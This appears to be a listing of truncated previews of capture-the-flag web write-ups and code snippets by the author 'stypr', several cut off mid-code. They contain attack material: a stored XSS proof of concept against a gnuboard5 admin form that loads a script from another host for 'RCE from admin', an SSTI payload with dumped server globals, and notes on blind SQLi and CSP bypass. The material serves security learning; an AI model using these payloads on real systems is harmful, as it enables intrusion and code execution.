stypr

web: temporary writeup

There are two instances namely public and internal. We can get the address of public by leaking $_SERVER['REMOTE_ADDR"] in phpinfo.php?phpinfo

$_SERVER['SERVER_NAME']	_
$_SERVER['SERVER_PORT']	80
$_SERVER['SERVER_ADDR']	172.21.0.2

stypr

web: simpleboard writeup

Let's check the main page's source code by view-source (view-source:http://web1.bingo.hypwnlab.com:12044/)

As wee see in the following, server loads an image from a website.

        <h3 class="text-center text-white pt-5"><img src="/?image=6c6f676f.png"></h3>

Let's take a look at the function in init.php that loads the image.

stypr

<!--
	Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
	<input type='hidden' name='fg_no' value=''>
	<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
	var random = Math.round(Math.random() * 1000000000);
	var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin

stypr

<?php

// Ported from papago.py
// v1: b64_enc(rot13([:16]) + [16:])
/* Derived from stackoverflow */
function uuidgen() {
   return sprintf('%08x-%04x-%04x-%04x-%04x%08x',
      mt_rand(0, 0xffffffff),
      mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff),
      mt_rand(0, 0xffff), mt_rand(0, 0xffffffff)

stypr

There are several ways to bypass blind SQLi filters, and today I will introduce MySQL blind sqli payload using an insert() function.

Interestingly, the payload itself is limited to MySQL, but the technical side of this attack should be still valid in most SQL.

This attack is useful when typical substring filters (i.e. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ... ) are blocked by the script.

TL;DR

stypr

SSTI

1. Write one comment
2. When writing a comment content, do SSTI to leak author's credentials

{rating[comments][0].__class__.__init__.__globals__}
{'__name__': 'app.loaddata', '__doc__': None, '__package__': 'app', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, '__spec__': ModuleSpec(name='app.loaddata', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, origin='./app/loaddata.py'), '__file__': './app/loaddata.py', '__cached__': './app/__pycache__/loaddata.cpython-38.pyc', '__builtins__': {'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': , '__spec__': ModuleSpec(name='builtins', loader=), '__build_class__': , '__import__': , 'abs': , 'all': , 'any': , 'ascii': , 'bin': , 'breakpoint': , 'callable': , 'chr': , 'compile': , 'delattr': , 'dir': , 'divmod': , 'eval': , 'exec': , 'format': 

stypr

#!/usr/bin/python
#Nothing on stackoverflow works!

import zipfile
import sys

zip = zipfile.ZipFile('FILENAME', 'r')
zipinfo = zip.infolist()
for _file in zipinfo:
    _file.filename = bytes(_file.filename).decode('cp949')

stypr

Solution

1. if(md5($salt.$api_string) !== $sig){ can be bypassed with hash length extension attack (didn't do it, but the key length is 12.)

2. Use custom header and body to trigger CSP bypass.

stypr

Mathboy7 (415pt)

ENCRYPT() 함수를 통해 Random String을 만들 수 있음

encryption-functions from mysql.com

1. ENCRYPT(x) 시 확률상 문제를 풀 수 없지만, salt 값을 설정하면 첫번째 몇 글자 정도는 같게 되므로 확률이 굉장히 줄어듬.

2. ENCRYPT(x,y) 출력시 나오는 값은 A-Za-z0-9./ 로 이루어져있어서 확률상 어렵지만, 문제에서 strtolower($var) 로 인해 확률이 2차적으로 줄어들음.

stypr

Quick Summary

First-blooded this challenge. The server is down, I cannot explain briefly

1. Comment in the website shows get_perm.php

2. Another comment in the get_perm.php shows ?remote_debug=1.

3. Using a php trick, you get a write post privilege.